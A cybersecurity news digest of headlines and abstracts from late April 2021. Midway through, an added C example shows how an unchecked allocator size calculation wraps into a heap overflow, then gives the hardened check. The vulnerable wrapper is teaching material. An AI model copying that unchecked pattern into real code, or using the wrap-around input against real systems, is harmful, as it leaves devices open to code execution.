April, 2021
April 30, 2021 – Ransomware
The Week in Ransomware - April 30th 2021 - Attacks Escalate Full Text
Abstract
Ransomware gangs continue to target organizations large and small, including a brazen attack on the Washington DC police department.BleepingComputer
April 30, 2021 – Malware
Purple Lambert, a new malware of CIA-linked Lambert APT group Full Text
Abstract
Experts from Kaspersky explained that in February 2019, multiple antivirus companies received a collection of malware samples, some of which could not be associated with the activity of known APT groups.Security Affairs
April 30, 2021 – General
Hillicon Valley: DOJ to review cyber challenges | Gaetz, House Republicans want to end funding for postal service surveillance | TikTok gets new CEO Full Text
Abstract
Social media giant TikTok gained a new CEO on Friday with ties to parent company ByteDance. Meanwhile, a top Justice Department official said the agency would soon undertake a cybersecurity review to improve its response to cyber threats, and the European Commission clapped back at Apple for allegedly abusing its dominant position on its App Store for music streaming apps.The Hill
April 30, 2021 – Breach
British Prime Minister’s Cell Phone Number Exposed Full Text
Abstract
Boris Johnson’s personal cell phone number reportedly available online since 2006Infosecurity Magazine
April 30, 2021 – Government
House Armed Services Holds Hearing on Technology and Information Warfare Full Text
Abstract
On Friday, April 30, 2021, at 3:00 p.m., the House Armed Services Subcommittee on Cyber, Innovative Technologies and Information Systems will hold a hearing titled, "Technology and Information Warfare: The Competition for Influence and the Department of Defense." The subcommittee will hear testimony from Nina Jankowicz, a fellow at the Wilson Center; Glenn Gerstell, the former general counsel for the National Security Agency; Herb Lin, a senior research scholar at Stanford University; and Joseph Kirschbaum, the director of the defense capabilities management team at the Government AccountabLawfare
April 30, 2021 – APT
China-linked APT uses a new backdoor in attacks at Russian defense contractor Full Text
Abstract
A China-linked cyberespionage group is targeting a Russian defense contractor involved in designing nuclear submarines for the Russian Navy, using a previously undocumented backdoor. Cybereason researchers...Security Affairs
April 30, 2021 – Malware
Researchers sound the alarm after GitHub floats stricter policies Full Text
Abstract
GitHub on Thursday solicited the comments of the security research community on its new, apparently stricter policies for posting malware and proof-of-concept exploits.SCMagazine
April 30, 2021 – Malware
PortDoor Espionage Malware Takes Aim at Russian Defense Sector Full Text
Abstract
The stealthy backdoor is likely being used by Chinese APTs, researchers said.Threatpost
April 30, 2021 – Breach
First Horizon bank online accounts hacked to steal customers’ funds Full Text
Abstract
Bank holding company First Horizon Corporation disclosed that some of its customers had their online banking accounts breached by unknown attackers earlier this month.BleepingComputer
April 30, 2021 – Policy and Law
Gaetz, House Republicans introduce bill to defund Postal Service covert operations program Full Text
Abstract
Rep. Matt Gaetz (R-Fla.) and a group of other House Republicans on Friday introduced legislation to end funding for an arm of the U.S. Postal Service that carries out online surveillance.The Hill
April 30, 2021 – Criminals
UNC2447 cybercrime gang exploited SonicWall Zero-Day before it was fixed Full Text
Abstract
The UNC2447 cybercrime gang exploited a zero-day in SonicWall's Secure Mobile Access (SMA) appliances, patched by the vendor earlier this year, before a fix was available. Researchers from FireEye’s Mandiant revealed that a sophisticated cybercrime gang tracked...Security Affairs
April 30, 2021 – Education
Cyber.org pilot program aims to steer minority students toward HBCU cyber degrees Full Text
Abstract
Said T. Lamar Goree, superintendent of Caddo Parish Public Schools, of the program: “This is going to help us change the trajectory of black and brown children, and underserved children, from a socioeconomic perspective.”SCMagazine
April 30, 2021 – Ransomware
Babuk quits ransomware encryption, focuses on data-theft extortion Full Text
Abstract
A new message today from the operators of Babuk ransomware clarifies that the gang has decided to close the affiliate program and move to an extortion model that does not rely on encrypting victim computers.BleepingComputer
April 30, 2021 – Government
Justice Department to undertake 120 day review of cybersecurity challenges Full Text
Abstract
The Justice Department will soon begin a 120 day review of cybersecurity challenges in the midst of escalating cyber threats.The Hill
April 30, 2021 – Vulnerabilities
Microsoft warns of damaging vulnerabilities in dozens of IoT operating systems Full Text
Abstract
The flaws affect at least 25 different products made by more than a dozen organizations, including Amazon, ARM, Google Cloud, Samsung, RedHat, Apache and others.SCMagazine
April 30, 2021 – Malware
Fake Replica Sites of 900 Global News Outlets Target Users with Malware and Scam Advertisements Full Text
Abstract
In perhaps one of the biggest phishing incidents targeting some of the world’s largest news organizations, hackers have created fake replica websites of 900 global news portals.The Times Of India
April 30, 2021 – Outage
Hotbit cryptocurrency exchange down after hackers targeted wallets Full Text
Abstract
Cryptocurrency trading platform Hotbit has shut down all services for at least a week after a cyberattack that took down several of its services on Thursday evening.BleepingComputer
April 30, 2021 – Phishing
Your stolen ParkMobile data is now free for wannabe scammers Full Text
Abstract
The account information for almost 22 million ParkMobile customers is now in the hands of hackers and scammers after the data was released for free on a hacking forum.BleepingComputer
April 30, 2021 – Policy and Law
Software Company Self-Reports Illegal Exports Full Text
Abstract
SAP fined $8m after admitting it exported US-made patches and upgrades to Iran for seven yearsInfosecurity Magazine
April 30, 2021 – Ransomware
An alleged ransomware attack hit the Italian Banca di Credito Cooperativo causing chaos Full Text
Abstract
Banca di Credito Cooperativo (BCC), one of the largest Italian cooperative credit banks, was hit by a cyberattack allegedly carried out by one of the most aggressive ransomware gangs, Darkside.Security Affairs
April 30, 2021 – General
INSA Forms Critical Infrastructure Subcommittee Full Text
Abstract
Privately owned critical infrastructure to benefit from new cybersecurity delegationInfosecurity Magazine
April 30, 2021 – Criminals
Hacking group that targeted D.C. police briefly posts internal police files Full Text
Abstract
The documents posted Wednesday ran into the hundreds of pages and included names, Social Security numbers, phone numbers, financial and housing records, job histories, and polygraph assessments.Washington Post
April 30, 2021 – Hacker
Suspected Chinese state hackers target Russian submarine designer Full Text
Abstract
Hackers suspected to work for the Chinese government have used a new malware called PortDoor to infiltrate the systems of an engineering company that designs submarines for the Russian Navy.BleepingComputer
April 30, 2021 – Government
New SEI CERT chief and first ever federal CISO: old cybersecurity models have ‘been overcome’ Full Text
Abstract
SC Media caught up with Greg Touhill this week to learn what issues and projects he plans to prioritize in his role and how the old cybersecurity models we’ve relied on no longer work. In his words, “we need to change our game plan, because the traditional cybersecurity tactics, techniques and procedures that we’ve used for many years are no longer working the way we need them to be.”SCMagazine
April 30, 2021 – Phishing
Saving World Health Day: UNICC and Group-IB take down scam campaign impersonating the World Health Organization Full Text
Abstract
UNICC and Group-IB detected and took down a massive multistage scam campaign circulating online on April 7, World Health Day. Group-IB, a global threat hunting and adversary-centric cyber intelligence company that specializes in investigating hi-tech...Security Affairs
April 30, 2021 – Policy and Law
US prosecutors fine German software company for violating sanctions against Iran Full Text
Abstract
Federal prosecutors have imposed a fine on a German software company for violating sanctions against Iran.The Hill
April 30, 2021 – Policy and Law
Senators introduce bill to increase US technology competitiveness against China Full Text
Abstract
Sens. Catherine Cortez Masto (D-Nev.) and Rob Portman (R-Ohio) on Friday introduced a bill to improve U.S. competitiveness against China and other nations by strengthening the nation’s ability to set standards around emerging technologies.The Hill
April 30, 2021 – General
Middle market companies facing a record number of data breaches Full Text
Abstract
Middle market companies possess a lot of valuable data but continue to lack appropriate levels of protective controls and staffing, according to a report from RSM US and the U.S. Chamber of Commerce.Help Net Security
April 30, 2021 – Vulnerabilities
ISC Urges Organizations to Update DNS Servers to Wipe Out New BIND Vulnerabilities Full Text
Abstract
This week, the organization said the vulnerabilities impact ISC Berkeley Internet Name Domain (BIND) 9, widely used as a DNS system and maintained as an open-source project.ZDNet
April 30, 2021 – Ransomware
Hackers Exploit SonicWall Zero-Day Bug in FiveHands Ransomware Attacks Full Text
Abstract
An "aggressive" financially motivated threat group tapped into a zero-day flaw in SonicWall VPN appliances prior to it being patched by the company to deploy a new strain of ransomware called FIVEHANDS. The group, tracked by cybersecurity firm Mandiant as UNC2447, took advantage of an "improper SQL command neutralization" flaw in the SSL-VPN SMA100 product (CVE-2021-20016, CVSS score 9.8) that allows an unauthenticated attacker to achieve remote code execution. "UNC2447 monetizes intrusions by extorting their victims first with FIVEHANDS ransomware followed by aggressively applying pressure through threats of media attention and offering victim data for sale on hacker forums," Mandiant researchers said. "UNC2447 has been observed targeting organizations in Europe and North America and has consistently displayed advanced capabilities to evade detection and minimize post-intrusion forensics." CVE-2021-20016 is the same zero-day that theThe Hacker News
April 30, 2021 – Breach
Contact-tracing apps: Android phones were leaking sensitive data, find researchers Full Text
Abstract
Hundreds of third-party apps in Android devices were given access to sensitive data logged by contact-tracing apps built on Google and Apple's API, according to security researchers.ZDNet
April 30, 2021 – Government
Five US Federal Government Agencies Potentially Breached in Pulse Connect Secure VPN Attacks Full Text
Abstract
Hackers with suspected ties to China repeatedly took advantage of vulnerabilities in Pulse Secure VPN, a widely used remote connectivity tool, to gain access to government agencies and defense firms.CNN Money
April 30, 2021 – Vulnerabilities
Microsoft Warns 25 Critical Vulnerabilities in IoT, Industrial Devices Full Text
Abstract
Azure Defender security team discovers that memory allocation is a systemic problem that can allow threat actors to execute malicious code remotely or cause entire systems to crash.Threatpost
April 30, 2021 – Vulnerabilities
Microsoft warns of BadAlloc flaws in OT, IoT devices Full Text
Abstract
Microsoft researchers are warning of major security vulnerabilities affecting OT and IoT devices and high-risks for businesses using them. Researchers from Microsoft’s Section 52 team recently uncovered several critical memory allocation flaws,...Security Affairs
April 30, 2021 – Breach
Paleo Lifestyle Brand Exposes Customers to Fraud in Massive Data Breach Full Text
Abstract
The data breach originated from an unsecured cloud storage account Paleohacks was using to store the private data and personal details of over 70,000 customers and users.VPN Mentor
April 30, 2021 – Government
U.S. government probes VPN hack within federal agencies, races to find clues Full Text
Abstract
The new government breaches involve a popular virtual private network (VPN) known as Pulse Connect Secure, which hackers were able to break into using some known security flaws.Reuters
April 30, 2021 – Vulnerabilities
Command injection flaw in PHP Composer allowed supply-chain attacks Full Text
Abstract
The command injection vulnerability was discovered by researchers from SonarSource, who warn that the flaw could have been exploited to conduct a supply-chain attack.Security Affairs
April 30, 2021 – Ransomware
Ransomware Task Force Urges Tighter Crypto Regulation Full Text
Abstract
Long-awaited document calls for closer international co-operationInfosecurity Magazine
April 30, 2021 – Breach
Paleo Lifestyle Site Found Leaking PII on 70,000 Users Full Text
Abstract
Paleohacks misconfigured an AWS S3 bucketInfosecurity Magazine
April 30, 2021 – Government
Biden takes quick action on cyber in first 100 days Full Text
Abstract
President Biden and his administration hit the ground running on securing federal networks and critical infrastructure during his first 100 days in office, taking quick action after years of what some officials viewed as national security setbacks in U.S. cyber policy.The Hill
April 30, 2021 – Vulnerabilities
Microsoft Finds ‘BadAlloc’ Flaws Affecting Wide-Range of IoT and OT Devices Full Text
Abstract
Microsoft researchers on Thursday disclosed two dozen vulnerabilities affecting a wide range of Internet of Things (IoT) and Operational Technology (OT) devices used in industrial, medical, and enterprise networks that could be abused by adversaries to execute arbitrary code and even cause critical systems to crash. "These remote code execution (RCE) vulnerabilities cover more than 25 CVEs and potentially affect a wide range of domains, from consumer and medical IoT to Industrial IoT, Operational Technology, and industrial control systems," said Microsoft's 'Section 52' Azure Defender for IoT research group. The flaws have been collectively named "BadAlloc," for they are rooted in standard memory allocation functions spanning widely used real-time operating systems (RTOS), embedded software development kits (SDKs), and C standard library (libc) implementations. A lack of proper input validations associated with these memory allocation functionsThe Hacker News
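The allocation-size arithmetic that the BadAlloc entry above describes, as an added illustration that is not code from Microsoft's advisory or from any affected RTOS or libc: an allocator wrapper that multiplies an element count by an element size and adds a bookkeeping header, first with unchecked size_t arithmetic and then with the input validation the advisory calls for. The header size, the function names and the constructed "evil" count are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed bookkeeping header the allocator prepends to each block (example only). */
#define HDR_SIZE ((size_t)8)

/*
 * Vulnerable pattern: the request size is computed with unchecked size_t
 * arithmetic. When count * elem wraps past SIZE_MAX, the wrapper asks the
 * heap for a tiny block while the caller still believes it owns `count`
 * elements, so the next memcpy or loop over the buffer writes past the end
 * (a heap overflow, the BadAlloc failure mode).
 */
size_t vuln_request_size(size_t count, size_t elem)
{
    return count * elem + HDR_SIZE;
}

void *vuln_alloc(size_t count, size_t elem)
{
    return malloc(vuln_request_size(count, elem));
}

/*
 * Hardened pattern: validate the inputs before doing the arithmetic.
 * Returns 1 and stores the total in *total on success, 0 (with *total = 0)
 * if either the multiplication or the header addition would wrap.
 */
int safe_request_size(size_t count, size_t elem, size_t *total)
{
    size_t body;

    *total = 0;
    if (elem != 0 && count > SIZE_MAX / elem)   /* count * elem would wrap */
        return 0;
    body = count * elem;
    if (body > SIZE_MAX - HDR_SIZE)             /* body + HDR_SIZE would wrap */
        return 0;
    *total = body + HDR_SIZE;
    return 1;
}

/* Convenience for callers that only need the size: 0 means "rejected". */
size_t checked_request_size(size_t count, size_t elem)
{
    size_t total;
    return safe_request_size(count, elem, &total) ? total : 0;
}

void *safe_alloc(size_t count, size_t elem)
{
    size_t total;

    if (!safe_request_size(count, elem, &total))
        return NULL;                            /* refuse instead of under-allocating */
    return malloc(total);
}

int main(void)
{
    /* Constructed input: count * 4 equals 2^(width of size_t), so the product wraps to 0. */
    size_t evil_count = SIZE_MAX / 4 + 1;
    void *p;

    printf("vulnerable wrapper requests %zu bytes for %zu elements\n",
           vuln_request_size(evil_count, 4), evil_count);   /* prints 8, i.e. HDR_SIZE */

    p = vuln_alloc(evil_count, 4);
    printf("vulnerable alloc %s\n",
           p ? "succeeded with a header-sized block the caller will overrun" : "failed");
    free(p);

    printf("hardened wrapper returns %zu for the same request (0 = rejected)\n",
           checked_request_size(evil_count, 4));

    p = safe_alloc(1000, 4);                     /* legitimate request: 4000 + 8 bytes */
    if (p) {
        memset(p, 0, 1000 * 4);                  /* fits: the block really is 4008 bytes */
        free(p);
    }
    return 0;
}
```

The division check is portable C; on GCC and Clang the same guard can be written with `__builtin_mul_overflow(count, elem, &body)`, which also covers the non-size_t widths common in embedded SDKs. The point to check in a real allocator is every path that turns caller-supplied counts into a byte size, including alignment padding and the header, not just the multiplication.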
April 30, 2021 – Accident
Codecov starts notifying customers affected by supply-chain attack Full Text
Abstract
Codecov has now started notifying the maintainers of software repositories affected by the recent supply-chain attack. These notifications, delivered via both email and the Codecov application interface, state that the company believes the affected repositories were downloaded by threat actors.BleepingComputer
April 30, 2021 – Government
Cyberspace Solarium Commission: CISA Funding Should Increase by at Least $400M Full Text
Abstract
In a letter to the House Committee on Appropriations, two members of the Cyberspace Solarium Commission are asking for an increase in funding for the CISA in the fiscal year 2022.Security Week
April 30, 2021 – General
Here’s A New Forum for Cybersecurity Leaders Outside of the Fortune 2000 Full Text
Abstract
Perhaps due to the nature of the position, InfoSec leadership roles tend to be solitary ones. CISOs, or their equivalent decision-makers in organizations without the role, have so many constant drains on their attention – keeping their knowledge fresh, building plans to secure their organizations further – that they often find themselves on an island. It's even more challenging for organizations outside the Fortune 2000 that are resource-constrained. Security leaders are expected to know everything and often don't have anyone inside their organization with whom to bounce ideas or even go to for advice. When a crisis arises, they must often go with their gut or guess at the best solution based on their own experiences. Security leaders could often use advice but don't have an outlet for it. Chris Roberts, Chief Security Strategist at Cynet Security, offers a new Slack-based community for InfoSec leaders as a solution. The new InfoSec Leaders Community will feaThe Hacker News
April 30, 2021 – Ransomware
DC Officer Info Leaked Online by Ransomware Group: Report Full Text
Abstract
Babuk says this is its last big job before closing downInfosecurity Magazine
April 30, 2021 – Breach
Financial services firm First Horizon suffers data breach with customer funds stolen Full Text
Abstract
Disclosed in a filing with the SEC, the breach is described as involving an unauthorized third party obtaining login credentials from an unknown source and then attempting to access customer accounts.Silicon Angle
April 30, 2021 – Phishing
Passwordstate Warns of Ongoing Phishing Attacks Following Data Breach Full Text
Abstract
Click Studios, the Australian software firm which confirmed a supply chain attack affecting its Passwordstate password management application, has warned customers of an ongoing phishing attack by an unknown threat actor. "We have been advised a bad actor has commenced a phishing attack with a small number of customers having received emails requesting urgent action," the company said in an updated advisory released on Wednesday. "These emails are not sent by Click Studios." Last week, Click Studios said attackers had employed sophisticated techniques to compromise Passwordstate's update mechanism, using it to drop malware on user computers. Only customers who performed In-Place Upgrades between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC are said to be affected. While Passwordstate serves about 29,000 customers, the Adelaide-based firm maintained that the total number of impacted customers is very low. It's also urging users to refrain from poThe Hacker News
April 30, 2021 – Ransomware
Darkside Ransomware Returns with a Vengeance Full Text
Abstract
In March, threat intelligence experts warned of a new version of the ransomware that featured a faster encryption process, VoIP calling, and modules to target virtual machines.Cyware Alerts - Hacker News
April 29, 2021 – Government
Programs within military intel agencies in the US and UK show growing commitment to neurodiversity Full Text
Abstract
Efforts underway in both the DoD’s geospatial intelligence agency and the U.K.’s signals intel and information assurance organization show neurodivergent men and women with an interest in cybersecurity are finding new opportunities to bring their unique ways of thinking to the government workforce.SCMagazine
April 29, 2021 – Ransomware
Brazil’s Rio Grande do Sul court system hit by REvil ransomware Full Text
Abstract
Brazil's Tribunal de Justiça do Estado do Rio Grande do Sul was hit with an REvil ransomware attack yesterday that encrypted employees' files and forced the courts to shut down their network.BleepingComputer
April 29, 2021 – Ransomware
Babuk Ransomware Gang Mulls Retirement Full Text
Abstract
The RaaS operators have been posting, tweaking and taking down a goodbye note, saying that they’ll be open-sourcing their data encryption malware for other crooks to use.Threatpost
April 29, 2021 – Ransomware
QNAP warns of AgeLocker ransomware attacks on NAS devices Full Text
Abstract
QNAP customers are once again urged to secure their Network Attached Storage (NAS) devices to defend against Agelocker ransomware attacks targeting their data.BleepingComputer
April 29, 2021 – Vulnerabilities
Microsoft finds critical code execution bugs in IoT, OT devices Full Text
Abstract
Microsoft security researchers have discovered over two dozen critical remote code execution (RCE) vulnerabilities in Internet of Things (IoT) devices and Operational Technology (OT) industrial systems.BleepingComputer
April 29, 2021 – General
Hillicon Valley: Coalition unveils plan to help government, industry confront ransomware attacks | Labor secretary backs employee status for some gig workers | Joe Rogan clarifies vaccine comments: ‘I’m not an anti-vax person’ Full Text
Abstract
Experts unveiled a plan Thursday to combat ransomware attacks, amid a spike this year targeting hospitals and schools. Labor Secretary Marty Walsh weighed in on the debate over the classification of gig workers, and popular Spotify podcast host Joe Rogan clarified his controversial comments that young, healthy people don't need a COVID-19 vaccine.The Hill
April 29, 2021 – Ransomware
Ransomware group targeted SonicWall vulnerability pre-patch Full Text
Abstract
A ransomware group caught targeting a recently patched SonicWall vulnerability leveraged that vulnerability before the patch became available, Mandiant reported Thursday.SCMagazine
April 29, 2021 – Ransomware
New ransomware group uses SonicWall zero-day to breach networks Full Text
Abstract
A financially motivated threat actor exploited a zero-day bug in Sonicwall SMA 100 Series VPN appliances to deploy new ransomware known as FiveHands on the networks of North American and European targets.BleepingComputer
April 29, 2021 – Vulnerabilities
Command injection flaw in PHP Composer allowed supply-chain attacks Full Text
Abstract
A vulnerability in Composer, the PHP package manager, could have allowed an attacker to execute arbitrary commands and backdoor every PHP package. The Composer maintainers have addressed the critical vulnerability, tracked as CVE-2021-29472, that could...Security Affairs
April 29, 2021 – Ransomware
Ransomware gang Babuk claims DC’s Metropolitan Police was last caper – then goes dark Full Text
Abstract
The move was a surprising one after infiltrating such a high-value target, leaving some security experts skeptical that the group won’t reemerge anew.SCMagazine
April 29, 2021 – Vulnerabilities
F5 Big-IP Vulnerable to Security-Bypass Bug Full Text
Abstract
The KDC-spoofing flaw tracked as CVE-2021-23008 can be used to bypass Kerberos security and sign into the Big-IP Access Policy Manager or admin console.Threatpost
April 29, 2021 – Covid-19
Anti-Vaxxer Hijacks QR Codes at COVID-19 Check-In Sites Full Text
Abstract
The perp faces jail time, but the incident highlights the growing cyber-abuse of QR codes.Threatpost
April 29, 2021 – Breach
DoppelPaymer Gang Leaks Files from Illinois AG After Ransom Negotiations Break Down Full Text
Abstract
Information stolen in April 10 ransomware attack was posted on a dark web portal and includes private documents not published as part of public records.Threatpost
April 29, 2021 – Breach
Experian API Leaks Most Americans’ Credit Scores Full Text
Abstract
Researchers fear wider exposure, amidst a tepid response from Experian.Threatpost
April 29, 2021 – Ransomware
QNAP finds evidence of AgeLocker ransomware activity in the wild Full Text
Abstract
QNAP customers are once again urged to secure their Network Attached Storage (NAS) devices following a massive Qlocker ransomware campaign earlier this month.BleepingComputer
April 29, 2021 – Criminals
With Recent Law Enforcement Actions, Emotet’s Days are Now Over Full Text
Abstract
Europol claimed to wipe Emotet infection from hundreds of servers globally. The FBI, meanwhile, handed over 4.3 million email addresses to the Have I Been Pwned site to help mitigate infections.Cyware Alerts - Hacker News
April 29, 2021 – Ransomware
An alleged ransomware attack hit the Italian Banca di Credito Cooperativo causing chaos Full Text
Abstract
Banca di Credito Cooperativo (BCC), one of the largest Italian cooperative credit banks, was hit by a cyberattack allegedly...Security Affairs
April 29, 2021 – Hacker
Russian Hackers Actively Targeting the U.S. and Other Organizations Full Text
Abstract
The FBI, the DHS, and the CISA warned of coordinated attacks, in a joint alert, by the Russian Foreign Intelligence Service, aka APT29, against U.S. and foreign organizations.Cyware Alerts - Hacker News
April 29, 2021 – Ransomware
Babuk ransomware readies ‘shut down’ post, plans to open source malware Full Text
Abstract
After just a few months of activity, the operators of Babuk ransomware briefly posted a short message about their intention to quit the extortion business after having achieved their goal.BleepingComputer
April 29, 2021 – Privacy
Flubot Spyware is Employing Smishing Attacks Full Text
Abstract
Hackers are targeting Android phone users across the U.K. via malicious text messages to steal banking information and credentials, and even lift passwords from devices.Cyware Alerts - Hacker News
April 29, 2021 – Malware
ToxicEye RAT is Exploiting Telegram Platform Full Text
Abstract
Private messaging app Telegram is being abused by cyberattackers who deliver the ToxicEye RAT and control it through an attacker-operated Telegram account, using it to take over victims' machines and leak critical data.Cyware Alerts - Hacker News
April 29, 2021 – Government
White House Asked to Increase Crypto Regulation Full Text
Abstract
Task force urges Biden to tackle ransomware attacks, disrupt cyber-criminals' safe havens, and regulate crypto more tightlyInfosecurity Magazine
April 29, 2021 – Ransomware
Multi-Gov Task Force Plans to Take Down the Ransomware Economy Full Text
Abstract
A coalition of 60 global entities (including the DoJ) has proposed a sweeping plan to hunt down and disrupt ransomware gangs by going after their financial operations.Threatpost
April 29, 2021 – Vulnerabilities
Several High-Severity Vulnerabilities Expose Cisco Firewalls to Remote Attacks Full Text
Abstract
Tracked as CVE-2021-1448 and having a CVSS score of 7.8, the command injection bug is mitigated by the fact that authentication and local access are required for successful exploitation.Security Week
April 29, 2021 – Business
Accenture to Acquire Openminded Full Text
Abstract
Accenture enters into agreement to acquire French cybersecurity services companyInfosecurity Magazine
April 29, 2021 – Policy and Law
Boston Nanny Arrested After Cyber-Tip Full Text
Abstract
Police trace shared child sexual abuse material back to well-established nanny and babysitterInfosecurity Magazine
April 29, 2021 – Breach
Experian API Exposed Credit Scores of Most Americans – Krebs on Security Full Text
Abstract
Experian fixed a weakness with a partner website that let anyone look up the credit score of tens of millions of Americans just by supplying their name and mailing address, KrebsOnSecurity reported.Krebs on Security
April 29, 2021 – Government
Northern Ireland Government Announces Partnership to Offer Cyber Career Opportunities Full Text
Abstract
Participants will be trained via Immersive Labs online platformInfosecurity Magazine
April 29, 2021 – Vulnerabilities
An issue in the Linux Kernel could allow the hack of your system Full Text
Abstract
An information disclosure issue in the Linux kernel allows a KASLR bypass and could potentially be exploited in attacks in the wild. The flaw, tracked as CVE-2020-28588, could allow attackers to bypass the Kernel Address...Security Affairs
April 29, 2021 – Covid-19
COVID-19 Results for 25% of Wyoming Accidentally Posted Online Full Text
Abstract
Sorry, we’ve upchucked your COVID test results and other medical and personal data into public GitHub storage buckets, the Wyoming Department of Health said.Threatpost
April 29, 2021 – Ransomware
Whistler resort municipality hit by new ransomware operation Full Text
Abstract
The Whistler municipality in British Columbia, Canada, has suffered a cyberattack at the hands of a new ransomware operation.BleepingComputer
April 29, 2021 – Business
Accenture acquires French cybersecurity firm Openminded Full Text
Abstract
Openminded provides cybersecurity services including management, consultancy, and cloud & infrastructure solutions with a focus on risk analysis, remediation, and regulatory compliance.ZDNet
April 29, 2021 – Government
Iran updates budget to allocate $71.4 million to ‘cyberspace’ operations Full Text
Abstract
The Tehran government has updated its national budget to allocate an extra $71.4 million for the cyberspace programs of two government-controlled organizations, IRIB and IDO.The Record
April 29, 2021 – Ransomware
Security expert coalition shares actions to disrupt ransomware Full Text
Abstract
The Ransomware Task Force, a public-private coalition of more than 50 experts, has shared a framework of actions to disrupt the ransomware business model.BleepingComputer
April 29, 2021 – Deepfake
Deepfakes Are Getting Closer to Reality Full Text
Abstract
Several positive steps continue to be taken by organizations such as the European Union and the U.S. FTC to curb possible malicious uses and abuses of AI via new regulations.Trend Micro
April 29, 2021 – Government
Biden prepping cybersecurity executive order in response to SolarWinds attack Full Text
Abstract
President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December.The Hill
April 29, 2021 – Vulnerabilities
A New PHP Composer Bug Could Enable Widespread Supply-Chain Attacks Full Text
Abstract
The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later. "Fixed command injection vulnerability in HgDriver/HgDownloader and hardened other VCS drivers and downloaders," Composer said in its release notes for versions 2.0.13 and 1.10.22 published on Wednesday. "To the best of our knowledge the vulnerability has not been exploited." Composer is billed as a tool for dependency management in PHP, enabling easy installation of packages relevant to a project. It also allows users to install PHP applications that are available on Packagist, a repository that aggregates all public PThe Hacker News
April 29, 2021 – Criminals
Emotet Group Harvested Over 4.3 Million Victim Emails Full Text
Abstract
Concerned users can now check with HaveIBeenPwnedInfosecurity Magazine
April 29, 2021 – General
Data Brokers and National Security Full Text
Abstract
Policymakers have paid scant consideration to the national security implications of unfettered, largely unregulated data brokering. That may be changing.Lawfare
April 29, 2021 – Malware
Purple Lambert, a new malware of CIA-linked Lambert APT group Full Text
Abstract
Cybersecurity firm Kaspersky has discovered a new strain of malware that experts believe is part of the arsenal of the US Central Intelligence Agency (CIA).Security Affairs
April 29, 2021 – Ransomware
Ransomware Task Force releases long-awaited recommendations Full Text
Abstract
More than 60 stakeholders contributed to a ransomware framework released Thursday morning, which advocates for nearly 50 interlocking government and private sector strategies to tackle the criminal scourge.SCMagazine
April 29, 2021 – Attack
SaaS Attacks: Lessons from Real-Life Misconfiguration Exploits Full Text
Abstract
There is a way to protect users from deceptive OAuth apps, misconfigurations and misappropriated user permissions. SaaS Security Posture Management (SSPM) takes an automated approach to tracking, and even remediating, the exploitable misconfigurations in organizations’ SaaS apps.Threatpost
April 29, 2021 – Criminals
The Sodinokibi Chronicles: A (R)Evil Cybercrime Gang Disrupting Organizations for Trade Secrets and Cash Full Text
Abstract
Once Sodinokibi focuses on a potential victim, the attack goes into a more sophisticated operation by human actors who pave their way through the compromised networks to find data and exfiltrate it.Security Intelligence
April 29, 2021 – Ransomware
Coalition unveils plan to help government, industry confront ransomware attacks Full Text
Abstract
A coalition of experts on Thursday unveiled a road map for the federal government and industry to potentially use in combating ransomware attacks, which have spiked over the past year as hackers targeted organizations including hospitals and schools.The Hill
April 29, 2021 – Hacker
LuckyMouse Hackers Target Banks, Companies and Governments in 2020 Full Text
Abstract
An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East. The malicious activity, collectively named "EmissarySoldier," has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank. LuckyMouse, also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization (ICAO)The Hacker News
April 29, 2021 – Accident
Cancer Patients Diverted After Cyber-Attack on MedTech Firm Full Text
Abstract
Supply chain attack caused disruption across the countryInfosecurity Magazine
April 29, 2021 – Vulnerabilities
RotaJakiro Linux backdoor has flown under the radar since 2018 Full Text
Abstract
Experts recently uncovered a Linux backdoor, dubbed RotaJakiro, that has flown under the radar for many years while harvesting and exfiltrating sensitive information from victims. RotaJakiro is a Linux backdoor recently discovered by researchers...Security Affairs
April 29, 2021 – Business
Threat Detection Firm Vectra Raises $130 Million at $1.2 Billion Valuation Full Text
Abstract
Threat detection and response solutions provider Vectra AI on Thursday announced that it has raised $130 million at a valuation of $1.2 billion, making the company the latest cybersecurity unicorn.Security Week
April 29, 2021 – Vulnerabilities
How to Conduct Vulnerability Assessments: An Essential Guide for 2021 Full Text
Abstract
Hackers are scanning the internet for weaknesses all the time, and if you don't want your organization to fall victim, you need to be the first to find these weak spots. In other words, you have to adopt a proactive approach to managing your vulnerabilities, and a crucial first step in achieving this is performing a vulnerability assessment. Read this guide to learn how to perform vulnerability assessments in your organization and stay ahead of the hackers. Vulnerability assessment tools: Vulnerability assessments are automated processes performed by scanners. This makes them accessible to a wide audience. Many of the scanners are geared towards cybersecurity experts, but there are solutions tailored for IT managers and developers in organizations without dedicated security teams. Vulnerability scanners come in various types: some excel at network scanning, others at web applications, IoT devices, or container security. If you're a small business, you're likely to findThe Hacker News
April 29, 2021 – Breach
First Horizon Bank Customers Have Account Funds Drained Full Text
Abstract
Attackers stole less than $1 million after breaching internal securityInfosecurity Magazine
April 29, 2021 – Phishing
Lloyds Bank warning as Britons attacked by another text message scam Full Text
Abstract
The criminals are preying on Britons’ worries about their financial information being compromised, and money stolen. However, ironically, this is exactly what the fraudsters hope to accomplish.Express
April 29, 2021 – Government
Chinese Hackers Attacking Military Organizations With New Backdoor Full Text
Abstract
